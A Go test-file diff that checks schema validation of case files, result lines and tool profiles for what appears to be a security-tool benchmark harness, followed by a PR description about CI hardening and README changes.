+				ExpectedVerdict: tt.expected, ActualVerdict: tt.actual, Score: tt.score,
+				Evidence: map[string]interface{}{}, Notes: strPtr(""),
+			}
+			errors := validateResultLine(1, r)
+			hasErr := len(errors) > 0
+			if hasErr != tt.wantErr {
+				t.Errorf("wantErr=%v but got errors: %v", tt.wantErr, errors)
+			}
+		})
+	}
+}
+
+func TestResultValidation_DuplicateCaseId(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "results.jsonl")
+	lines := `{"case_id":"a","tool":"t","tool_version":"1","expected_verdict":"block","actual_verdict":"block","score":"pass","evidence":{},"notes":""}
+{"case_id":"a","tool":"t","tool_version":"1","expected_verdict":"block","actual_verdict":"allow","score":"fail","evidence":{},"notes":""}`
+	os.WriteFile(path, []byte(lines), 0o600)
+
+	errors := validateResultsFile(path)
+	found := false
+	for _, e := range errors {
+		if strings.Contains(e, "duplicate case_id") {
+			found = true
+		}
+	}
+	if !found {
+		t.Fatal("expected duplicate case_id error")
+	}
+}
+
+func TestResultValidation_EmptyFile(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "empty.jsonl")
+	os.WriteFile(path, []byte(""), 0o600)
+
+	errors := validateResultsFile(path)
+	if len(errors) == 0 {
+		t.Fatal("expected error for empty file")
+	}
+}
+
+// --- Profile validation tests ---
+
+func TestProfileValidation_Valid(t *testing.T) {
+	sup := allSupportsKeys()
+	sup["fetch_proxy"] = true
+	p := Profile{
+		SchemaVersion: 1, Tool: "test", ToolVersion: "1.0", RunnerVersion: "v1",
+		Claims:   []string{"url_dlp", "ssrf"},
+		Supports: sup,
+	}
+	errors := validateProfile(p)
+	if len(errors) != 0 {
+		t.Fatalf("expected no errors, got: %v", errors)
+	}
+}
+
+func TestProfileValidation_InvalidClaims(t *testing.T) {
+	p := Profile{
+		SchemaVersion: 1, Tool: "test", ToolVersion: "1.0", RunnerVersion: "v1",
+		Claims:   []string{"url_dlp", "not_a_real_claim"},
+		Supports: allSupportsKeys(),
+	}
+	errors := validateProfile(p)
+	found := false
+	for _, e := range errors {
+		if strings.Contains(e, "invalid claim") {
+			found = true
+		}
+	}
+	if !found {
+		t.Fatal("expected invalid claim error")
+	}
+}
+
+func TestProfileValidation_MissingFields(t *testing.T) {
+	p := Profile{} // all empty/zero
+	errors := validateProfile(p)
+	if len(errors) < 4 {
+		t.Fatalf("expected multiple errors for empty profile, got %d: %v", len(errors), errors)
+	}
+}
+
+func TestProfileValidation_InvalidSupportsKey(t *testing.T) {
+	sup := allSupportsKeys()
+	sup["fake_key"] = true
+	p := Profile{
+		SchemaVersion: 1, Tool: "test", ToolVersion: "1.0", RunnerVersion: "v1",
+		Claims:   []string{"url_dlp"},
+		Supports: sup,
+	}
+	errors := validateProfile(p)
+	found := false
+	for _, e := range errors {
+		if strings.Contains(e, "invalid supports key") {
+			found = true
+		}
+	}
+	if !found {
+		t.Fatal("expected invalid supports key error")
+	}
+}
+
+func TestProfileValidation_NonBooleanSupports(t *testing.T) {
+	sup := allSupportsKeys()
+	sup["fetch_proxy"] = "yes"
+	p := Profile{
+		SchemaVersion: 1, Tool: "test", ToolVersion: "1.0", RunnerVersion: "v1",
+		Claims:   []string{"url_dlp"},
+		Supports: sup,
+	}
+	errors := validateProfile(p)
+	found := false
+	for _, e := range errors {
+		if strings.Contains(e, "must be a boolean") {
+			found = true
+		}
+	}
+	if !found {
+		t.Fatal("expected boolean error for supports value")
+	}
+}
+
+func TestProfileValidation_File(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "profile.json")
+	data := `{"schema_version":1,"tool":"test","tool_version":"1.0","runner_version":"v1","claims":["url_dlp"],"supports":{"fetch_proxy":true,"http_proxy":false,"mcp_stdio":false,"mcp_http":false,"websocket":false,"tls_interception":false,"request_body_scanning":false,"header_scanning":false,"response_scanning":false,"mcp_tool_baseline":false,"mcp_chain_memory":false}}`
+	_ = os.WriteFile(path, []byte(data), 0o600)
+
+	errors := validateProfileFile(path)
+	if len(errors) != 0 {
+		t.Fatalf("expected no errors, got: %v", errors)
+	}
+}
+
+// --- Regression tests for unknown fields and missing required fields ---
+
+func TestCaseValidation_RejectsUnknownFields(t *testing.T) {
+	dir := t.TempDir()
+	writeCase(t, dir, "url", "url-extra-001.json", `{
+		"schema_version": 1, "id": "url-extra-001", "category": "url",
+		"title": "T", "description": "D", "input_type": "url",
+		"transport": "fetch_proxy",
+		"payload": {"method": "GET", "url": "https://example.com"},
+		"expected_verdict": "block", "severity": "high",
+		"capability_tags": ["url_dlp"], "requires": [],
+		"false_positive_risk": "low", "why_expected": "test",
+		"notes": "", "source": "",
+		"bogus_field": "should fail"
+	}`)
+
+	ids := make(map[string]string)
+	path := filepath.Join(dir, "url", "url-extra-001.json")
+	errors := validateFile(path, ids)
+	assertContainsError(t, errors, "unknown field")
+}
+
+func TestResultValidation_RejectsUnknownFields(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "results.jsonl")
+	line := `{"case_id":"t","tool":"t","tool_version":"1","expected_verdict":"block","actual_verdict":"block","score":"pass","evidence":{},"notes":"","extra":"bad"}`
+	_ = os.WriteFile(path, []byte(line+"\n"), 0o600)
+
+	errors := validateResultsFile(path)
+	assertContainsError(t, errors, "unknown field")
+}
+
+func TestResultValidation_MissingNotes(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "results.jsonl")
+	line := `{"case_id":"t","tool":"t","tool_version":"1","expected_verdict":"block","actual_verdict":"block","score":"pass","evidence":{}}`
+	_ = os.WriteFile(path, []byte(line+"\n"), 0o600)
+
+	errors := validateResultsFile(path)
+	assertContainsError(t, errors, "missing notes")
+}
+
+func TestResultValidation_BlankOnlyFile(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "blank.jsonl")
+	_ = os.WriteFile(path, []byte("\n\n\n"), 0o600)
+
+	errors := validateResultsFile(path)
+	assertContainsError(t, errors, "no result lines")
+}
+
+func TestProfileValidation_MissingSupportsKeys(t *testing.T) {
+	p := Profile{
+		SchemaVersion: 1, Tool: "test", ToolVersion: "1.0", RunnerVersion: "v1",
+		Claims:   []string{"url_dlp"},
+		Supports: map[string]interface{}{"fetch_proxy": true},
+	}
+	errors := validateProfile(p)
+	assertContainsError(t, errors, "missing required supports key")
+}
+
+func TestProfileValidation_RejectsUnknownFields(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "profile.json")
+	data := `{"schema_version":1,"tool":"test","tool_version":"1.0","runner_version":"v1","claims":["url_dlp"],"supports":{"fetch_proxy":true,"http_proxy":false,"mcp_stdio":false,"mcp_http":false,"websocket":false,"tls_interception":false,"request_body_scanning":false,"header_scanning":false,"response_scanning":false,"mcp_tool_baseline":false,"mcp_chain_memory":false},"bogus":true}`
+	_ = os.WriteFile(path, []byte(data), 0o600)
+
+	errors := validateProfileFile(path)
+	assertContainsError(t, errors, "unknown field")
+}


### PR DESCRIPTION
## Summary

- Pin all GitHub Actions to commit SHAs (OpenSSF Scorecard requirement)
- Add concurrency groups and timeout-minutes to all workflows
- Add OpenSSF Scorecard workflow (weekly + on push to main)
- Add GPL license deny list to dependency review
- Add 5 README badges (Validate, Security, Scorecard, Go Report Card, License)
- Improve README intro with architecture diagram and scope section